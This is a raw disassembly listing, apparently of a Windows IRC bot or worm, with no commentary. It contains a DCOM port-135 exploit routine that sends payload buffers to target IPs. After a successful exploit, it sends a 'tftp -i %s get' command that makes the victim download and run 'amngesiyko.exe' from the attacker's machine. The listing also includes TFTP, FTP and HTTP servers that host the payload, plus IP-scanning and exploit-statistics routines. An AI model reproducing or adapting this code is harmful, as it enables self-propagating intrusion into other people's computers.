jmp short loc_401DEE
; ---------------------------------------------------------------------------
loc_401D97: ; CODE XREF: sub_401B9B+118�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_4189A0
mov esi, offset dword_434F28
push esi
call sub_418E70
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_418A00
lea eax, [ebp+var_10]
push eax
call sub_418E70
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_418A00
mov eax, dword_435708
add esp, 2Ch
mov [ebp+var_768], eax
loc_401DEE: ; CODE XREF: sub_401B9B+1FA�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_4189A0
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401E2D
loc_401E26: ; CODE XREF: sub_401B9B+2B9�j
; sub_401B9B+2E0�j ...
xor al, al
jmp loc_401FD5
; ---------------------------------------------------------------------------
loc_401E2D: ; CODE XREF: sub_401B9B+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 68h
push offset dword_43533C
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401E26
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 0A0h
push offset dword_4353A8
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401E26
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_44B6D8 ; recv
cmp [ebp+arg_C0], ebx
jz loc_401F43
push 68h
lea eax, [ebp+var_89B4]
push offset dword_435560
push eax
call sub_418A00
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_418A00
push 70h
lea eax, [ebp+var_68DC]
push offset dword_4355CC
push eax
call sub_418A00
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_418A00
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_435640
push eax
call sub_418A00
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_401E26
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_401F99
; ---------------------------------------------------------------------------
loc_401F43: ; CODE XREF: sub_401B9B+2F8�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_43544C
push eax
call sub_418A00
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_418A00
push 90h
lea eax, [ebp+var_245C]
push offset off_4354CC
push eax
call sub_418A00
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_401F99: ; CODE XREF: sub_401B9B+3A6�j
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_401E26
push 12Ch
call ds:dword_4942D8
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_401A3C
add esp, 0BCh
test al, al
setnz al
loc_401FD5: ; CODE XREF: sub_401B9B+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_401B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FDA proc near ; CODE XREF: .text:00401776�p
var_854 = byte ptr -854h
var_810 = byte ptr -810h
var_214 = byte ptr -214h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_14]
push edi
push eax
mov [ebp+var_4], edi
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_14], 2
push eax
call dword_44B700 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_10], eax
call dword_44B6C0 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
call dword_44B740 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4020D3
lea eax, [ebp+var_14]
push 10h
push eax
push ebx
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4020D3
push edi
push 89h
push offset dword_4350C0
push ebx
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4020D3
mov esi, 640h
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_44B6D8 ; recv
push edi
push 0A8h
push offset dword_43514C
push ebx
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4020D3
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_44B6D8 ; recv
push edi
push 0DEh
push offset dword_4351F8
push ebx
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4020D3
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_44B6D8 ; recv
movsx eax, [ebp+var_810]
sub eax, 30h
jz short loc_4020DD
dec eax
jz short loc_4020DA
loc_4020D3: ; CODE XREF: sub_401FDA+54�j
; sub_401FDA+6A�j ...
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_4020DA: ; CODE XREF: sub_401FDA+F7�j
push edi
jmp short loc_402101
; ---------------------------------------------------------------------------
loc_4020DD: ; CODE XREF: sub_401FDA+F4�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_401B9B
add esp, 0C4h
test al, al
jnz short loc_402121
push 1
loc_402101: ; CODE XREF: sub_401FDA+101�j
push ebx
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_401B9B
add esp, 0C4h
test al, al
jz short loc_402128
loc_402121: ; CODE XREF: sub_401FDA+123�j
mov [ebp+var_4], 1
loc_402128: ; CODE XREF: sub_401FDA+145�j
push ebx
call dword_44B758 ; closesocket
cmp [ebp+var_4], 0
jz short loc_40219D
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset aSExploitingI_1 ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_214]
push 200h
push eax
call sub_418EF0
push 0
lea eax, [ebp+var_214]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_40842D
lea eax, [ebp+var_214]
push eax
call sub_4035E1
mov eax, [ebp+arg_A8]
add esp, 2Ch
imul eax, 3Ch
inc dword_436160[eax]
lea eax, dword_436160[eax]
loc_40219D: ; CODE XREF: sub_401FDA+159�j
push 1
pop eax
loc_4021A0: ; CODE XREF: sub_401FDA+FB�j
pop edi
pop esi
pop ebx
leave
retn
sub_401FDA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8D68h
call sub_418D40
mov eax, dword_4360DC
push ebx
push esi
push edi
mov [ebp-18h], eax
mov eax, dword_4360E0
push 1
mov [ebp-14h], eax
pop edi
lea eax, [ebp+0Ch]
push edi
push eax
call sub_4064A6
xor ebx, ebx
pop ecx
cmp eax, ebx
pop ecx
jz loc_4024AC
cmp eax, edi
jz loc_4024AC
cmp eax, 3
jnz short loc_4021F0
mov [ebp-4], ebx
jmp short loc_402204
; ---------------------------------------------------------------------------
loc_4021F0: ; CODE XREF: .text:004021E9�j
call sub_419000
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-4], edx
loc_402204: ; CODE XREF: .text:004021EE�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc_0 ; "\\\\%s\\ipc$"
lea eax, [ebp-60h]
push 28h
push eax
call sub_418EF0
add esp, 10h
xor esi, esi
lea eax, [ebp-127h]
loc_402223: ; CODE XREF: .text:00402232�j
mov cl, [ebp+esi-60h]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_402223
push 60h
lea eax, [ebp-0D8h]
push offset dword_435C38
push eax
call sub_418A00
lea eax, [ebp-60h]
push eax
call sub_418E70
shl eax, 1
push eax
lea eax, [ebp-128h]
push eax
lea eax, [ebp-0A8h]
push eax
call sub_418A00
add esp, 1Ch
lea eax, [ebp-60h]
push 9
push (offset aC_3+3)
push eax
call sub_418E70
pop ecx
lea eax, [ebp+eax*2-0A9h]
push eax
call sub_418A00
lea eax, [ebp-60h]
push eax
call sub_418E70
add al, 1Ah
push edi
shl al, 1
mov [ebp-5], al
lea eax, [ebp-5]
push eax
lea eax, [ebp-0D5h]
push eax
call sub_418A00
lea eax, [ebp-60h]
push eax
call sub_418E70
shl al, 1
add al, 9
push edi
mov [ebp-6], al
lea eax, [ebp-6]
push eax
lea eax, [ebp-0ABh]
push eax
call sub_418A00
add esp, 2Ch
push 135h
call dword_44B6C0 ; htons
xor eax, 9999h
push 2
mov [ebp-10h], eax
lea eax, [ebp-10h]
push eax
push offset dword_435938
call sub_418A00
add esp, 0Ch
cmp [ebp-4], edi
jz short loc_402360
cmp dword ptr [ebp-4], 2
jz short loc_402360
push 7D0h
lea eax, [ebp-12C8h]
push 90h
push eax
call sub_4189A0
mov esi, offset dword_435888
push esi
call sub_418E70
push eax
lea eax, [ebp-1228h]
push esi
push eax
call sub_418A00
lea eax, [ebp-18h]
push eax
call sub_418E70
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-0B0Ch]
push eax
call sub_418A00
mov eax, [ebp-4]
add esp, 2Ch
imul eax, 3Ch
mov eax, dword_436060[eax]
mov [ebp-0B1Ch], eax
jmp loc_402439
; ---------------------------------------------------------------------------
loc_402360: ; CODE XREF: .text:004022F5�j
; .text:004022FB�j
mov edi, 0DACh
lea eax, [ebp-2078h]
push edi
push 90h
push eax
call sub_4189A0
mov eax, [ebp-4]
push 4
imul eax, 3Ch
lea eax, dword_436060[eax]
mov [ebp-0Ch], eax
push eax
lea eax, [ebp-1894h]
push eax
call sub_418A00
mov esi, offset dword_435888
push esi
call sub_418E70
push eax
lea eax, [ebp-1884h]
push esi
push eax
call sub_418A00
push 4
lea eax, [ebp-1560h]
push offset dword_4360F0
push eax
call sub_418A00
push 4
lea eax, [ebp-155Ch]
push dword ptr [ebp-0Ch]
push eax
call sub_418A00
add esp, 40h
push esi
call sub_418E70
push eax
lea eax, [ebp-1550h]
push esi
push eax
call sub_418A00
add esp, 10h
xor esi, esi
lea eax, [ebp-4BB7h]
loc_4023F4: ; CODE XREF: .text:00402405�j
mov cl, [ebp+esi-2078h]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_4023F4
mov esi, 1C52h
lea eax, [ebp-8D68h]
push esi
push 31h
push eax
mov [ebp-3060h], bl
mov [ebp-305Fh], bl
call sub_4189A0
push esi
lea eax, [ebp-6C90h]
push 31h
push eax
call sub_4189A0
add esp, 18h
loc_402439: ; CODE XREF: .text:0040235B�j
push 0E29h
lea eax, [ebp-305Ch]
push 31h
push eax
call sub_4189A0
add esp, 0Ch
push ebx
push 1
push 2
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4024AC
push 10h
lea eax, [ebp-28h]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
mov word ptr [ebp-28h], 2
push dword ptr [ebp+0A8h]
call dword_44B6C0 ; htons
mov [ebp-26h], ax
lea eax, [ebp+0Ch]
push eax
call dword_44B700 ; inet_addr
mov [ebp-24h], eax
lea eax, [ebp-28h]
push 10h
push eax
push edi
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4024B3
loc_4024A5: ; CODE XREF: .text:004024C8�j
; .text:004024F4�j ...
push edi
loc_4024A6: ; CODE XREF: .text:00402747�j
; .text:004027C6�j
call dword_44B758 ; closesocket
loc_4024AC: ; CODE XREF: .text:004021D8�j
; .text:004021E0�j ...
xor eax, eax
loc_4024AE: ; CODE XREF: .text:0040284E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4024B3: ; CODE XREF: .text:004024A3�j
push ebx
push 89h
push offset dword_435A20
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4024A5
mov esi, 640h
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 0A8h
push offset dword_435AAC
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 0DEh
push offset dword_435B58
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
movsx eax, byte ptr [ebp-5]
add eax, 4
push ebx
push eax
lea eax, [ebp-0D8h]
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 68h
push offset dword_435C9C
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 0A0h
push offset dword_435D08
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
cmp dword ptr [ebp-4], 1
jz short loc_402617
cmp dword ptr [ebp-4], 2
jz short loc_402617
push 7Ch
lea eax, [ebp-305Ch]
push offset dword_435DAC
push eax
call sub_418A00
lea eax, [ebp-12C8h]
push 7D0h
push eax
lea eax, [ebp-2FE0h]
push eax
call sub_418A00
push 90h
lea eax, [ebp-2810h]
push offset off_435E2C
push eax
call sub_418A00
add esp, 24h
mov [ebp-2365h], bl
lea eax, [ebp-305Ch]
push ebx
push 0CF8h
jmp loc_4026BF
; ---------------------------------------------------------------------------
loc_402617: ; CODE XREF: .text:004025B4�j
; .text:004025BA�j
push 68h
lea eax, [ebp-8D68h]
push offset dword_435EC0
push eax
call sub_418A00
lea eax, [ebp-4BB8h]
push 1B5Ah
push eax
lea eax, [ebp-8D00h]
push eax
call sub_418A00
push 70h
lea eax, [ebp-6C90h]
push offset dword_435F2C
push eax
call sub_418A00
lea eax, [ebp-3B24h]
push 0A5Eh
push eax
lea eax, [ebp-6C20h]
push eax
call sub_418A00
push 84h
lea eax, [ebp-615Ch]
push offset dword_435FA0
push eax
call sub_418A00
add esp, 3Ch
lea eax, [ebp-8D68h]
push ebx
push 10FCh
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push 0FDCh
lea eax, [ebp-6C90h]
loc_4026BF: ; CODE XREF: .text:00402612�j
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_4024A5
push ebx
lea eax, [ebp-0AF8h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push 6
push 1
push 2
call dword_44B740 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_4024A5
push 10h
lea eax, [ebp-38h]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
mov word ptr [ebp-38h], 2
push 135h
call dword_44B6C0 ; htons
mov [ebp-36h], ax
lea eax, [ebp+0Ch]
push eax
call dword_44B700 ; inet_addr
mov [ebp-34h], eax
lea eax, [ebp-38h]
push 10h
push eax
push dword ptr [ebp-4]
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40274C
push edi
call dword_44B758 ; closesocket
push dword ptr [ebp-4]
jmp loc_4024A6
; ---------------------------------------------------------------------------
loc_40274C: ; CODE XREF: .text:0040273B�j
push ebx
push esi
mov esi, [ebp-4]
lea eax, [ebp-0AF8h]
push eax
push esi
call dword_44B6D8 ; recv
test eax, eax
jle loc_4024AC
push 1F4h
call ds:dword_4942D8
mov eax, offset aAmngesiyko_exe ; "amngesiyko.exe"
push eax
push eax
push dword ptr [ebp+8]
call sub_40AFEC
pop ecx
push eax
push offset aTftpISGetSSExi ; "tftp -i %s get %s&%s&exit\n"
lea eax, [ebp-2B8h]
push 190h
push eax
call sub_418EF0
add esp, 18h
lea eax, [ebp-2B8h]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp-2B8h]
push eax
push esi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4027CB
call dword_44B758 ; closesocket
push esi
jmp loc_4024A6
; ---------------------------------------------------------------------------
loc_4027CB: ; CODE XREF: .text:004027BD�j
call dword_44B758 ; closesocket
push esi
call dword_44B758 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset aSTryingSploitI ; "[%s]: Trying Sploit IP: %s."
lea eax, [ebp-4B8h]
push 200h
push eax
call sub_418EF0
add esp, 14h
cmp [ebp+0BCh], ebx
jnz short loc_402829
push ebx
lea eax, [ebp-4B8h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40842D
add esp, 14h
loc_402829: ; CODE XREF: .text:0040280A�j
lea eax, [ebp-4B8h]
push eax
call sub_4035E1
mov eax, [ebp+0B0h]
pop ecx
imul eax, 3Ch
inc dword_436160[eax]
push 1
lea eax, dword_436160[eax]
pop eax
jmp loc_4024AE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402853 proc near ; CODE XREF: sub_40C50A+5D5D�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_418D70
cmp dword_436158, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_4028C1
push esi
mov esi, offset dword_436160
loc_402886: ; CODE XREF: sub_402853+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_418D70
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_419040
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_402886
pop esi
loc_4028C1: ; CODE XREF: sub_402853+2B�j
push dword_491BE8
call sub_415273
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_418D70
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_419040
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
lea eax, [ebp+var_200]
push eax
call sub_4035E1
add esp, 38h
pop edi
pop ebx
leave
retn
sub_402853 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40291D proc near ; CODE XREF: sub_40C50A+56BC�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_416433
test eax, eax
pop ecx
jle short loc_402959
mov eax, [ebp+arg_C]
push dword_4443B8[eax*8]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_418D70
add esp, 0Ch
jmp short loc_40296C
; ---------------------------------------------------------------------------
loc_402959: ; CODE XREF: sub_40291D+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_418D70
pop ecx
pop ecx
loc_40296C: ; CODE XREF: sub_40291D+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
lea eax, [ebp+var_200]
push eax
call sub_4035E1
add esp, 18h
leave
retn
sub_40291D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402994 proc near ; CODE XREF: sub_40328A+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_402D24
imul eax, 3Ch
xor ebx, ebx
cmp dword_436164[eax], ebx
jz loc_402C05
push 4
call sub_416433
test eax, eax
pop ecx
jnz loc_402D24
mov eax, dword_43E1A0
push edi
mov edi, offset dword_445374
push 104h
push edi
push ebx
mov dword_445584, eax
mov dword_445580, ebx
call ds:dword_4942F8
push 103h
mov esi, offset dword_445478
push offset aAmngesiyko_exe ; "amngesiyko.exe"
push esi
call sub_4191A0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_445370, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_445608, eax
jnz short loc_402A47
lea eax, [ebp+arg_10]
push eax
push offset dword_445588
call sub_4191A0
add esp, 0Ch
mov dword_44560C, 1
jmp short loc_402A61
; ---------------------------------------------------------------------------
loc_402A47: ; CODE XREF: sub_402994+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_445588
call sub_4191A0
add esp, 0Ch
mov dword_44560C, ebx
loc_402A61: ; CODE XREF: sub_402994+B1�j
push esi
push edi
push dword_445584
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_4161EB
add esp, 20h
mov dword_44557C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_445370
push offset sub_415CF4
push ebx
push ebx
call ds:dword_4942F4
mov ecx, dword_44557C
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_402AD0
loc_402ABE: ; CODE XREF: sub_402994+13A�j
cmp dword_445610, ebx
jnz short loc_402AEB
push 32h
call ds:dword_4942D8
jmp short loc_402ABE
; ---------------------------------------------------------------------------
loc_402AD0: ; CODE XREF: sub_402994+128�j
call ds:dword_4942F0
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_418D70
add esp, 0Ch
loc_402AEB: ; CODE XREF: sub_402994+130�j
lea eax, [ebp+var_204]
push eax
call sub_4035E1
mov edi, offset dword_4459CC
mov [esp+210h+var_210], 104h
push edi
push ebx
mov dword_445BD8, ebx
call ds:dword_4942F8
push 103h
mov esi, offset dword_445AD0
push offset aAmngesiyko_exe ; "amngesiyko.exe"
push esi
call sub_4191A0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4459C8, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_445C60, eax
jnz short loc_402B66
lea eax, [ebp+arg_10]
push eax
push offset dword_445BE0
call sub_4191A0
add esp, 0Ch
mov dword_445C64, 1
jmp short loc_402B80
; ---------------------------------------------------------------------------
loc_402B66: ; CODE XREF: sub_402994+1B3�j
lea eax, [ebp+arg_90]
push eax
push offset dword_445BE0
call sub_4191A0
add esp, 0Ch
mov dword_445C64, ebx
loc_402B80: ; CODE XREF: sub_402994+1D0�j
push esi
push edi
push dword_445BDC
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on Port: %d, File"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_4161EB
add esp, 20h
mov dword_445BD4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4459C8
push offset sub_406614
push ebx
push ebx
call ds:dword_4942F4
mov ecx, dword_445BD4
pop edi
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_402BF4
loc_402BDE: ; CODE XREF: sub_402994+25E�j
cmp dword_445C68, ebx
jnz loc_402D17
push 32h
call ds:dword_4942D8
jmp short loc_402BDE
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402994+248�j
call ds:dword_4942F0
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_402D08
; ---------------------------------------------------------------------------
loc_402C05: ; CODE XREF: sub_402994+25�j
cmp dword_436168[eax], ebx
jz loc_402D24
push 3
call sub_416433
test eax, eax
pop ecx
jnz loc_402D24
mov esi, offset dword_4458A4
push 104h
push esi
push ebx
call ds:dword_4942F8
push 5Ch
push esi
call sub_419170
pop ecx
cmp eax, ebx
pop ecx
jz short loc_402C43
mov [eax], bl
loc_402C43: ; CODE XREF: sub_402994+2AB�j
mov eax, dword_43E1A4
mov dword_4459BC, ebx
mov dword_4459A8, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_44561C
call sub_418D70
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_445618, eax
mov ecx, [ebp+arg_138]
push esi
push dword_4459A8
mov dword_4459B4, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4459B8, ecx
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_4161EB
add esp, 20h
mov dword_4459B0, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_445618
push offset sub_406D34
push ebx
push ebx
call ds:dword_4942F4
mov ecx, dword_4459B0
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_402CFC
loc_402CEA: ; CODE XREF: sub_402994+366�j
cmp dword_4459C4, ebx
jnz short loc_402D17
push 32h
call ds:dword_4942D8
jmp short loc_402CEA
; ---------------------------------------------------------------------------
loc_402CFC: ; CODE XREF: sub_402994+354�j
call ds:dword_4942F0
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_402D08: ; CODE XREF: sub_402994+26C�j
lea eax, [ebp+var_204]
push eax
call sub_418D70
add esp, 0Ch
loc_402D17: ; CODE XREF: sub_402994+250�j
; sub_402994+35C�j
lea eax, [ebp+var_204]
push eax
call sub_4035E1
pop ecx
loc_402D24: ; CODE XREF: sub_402994+14�j
; sub_402994+35�j ...
pop esi
pop ebx
leave
retn
sub_402994 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D28 proc near ; CODE XREF: sub_403076:loc_4030E7�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4443B8h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_418A00
add esp, 0Ch
push [ebp+arg_0]
call dword_44B5F4 ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_44B6BC ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_418A00
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_402D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D70 proc near ; CODE XREF: sub_403076+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_418E70
cmp eax, 0Fh
pop ecx
jbe short loc_402D98
xor eax, eax
jmp short loc_402E09
; ---------------------------------------------------------------------------
loc_402D98: ; CODE XREF: sub_402D70+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_4192A0
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_402DC5
call sub_419000
mov [ebp+var_C], eax
loc_402DC5: ; CODE XREF: sub_402D70+4B�j
cmp [ebp+var_8], esi
jnz short loc_402DD2
call sub_419000
mov [ebp+var_8], eax
loc_402DD2: ; CODE XREF: sub_402D70+58�j
cmp [ebp+var_4], esi
jnz short loc_402DDF
call sub_419000
mov [ebp+var_4], eax
loc_402DDF: ; CODE XREF: sub_402D70+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_402DEB
call sub_419000
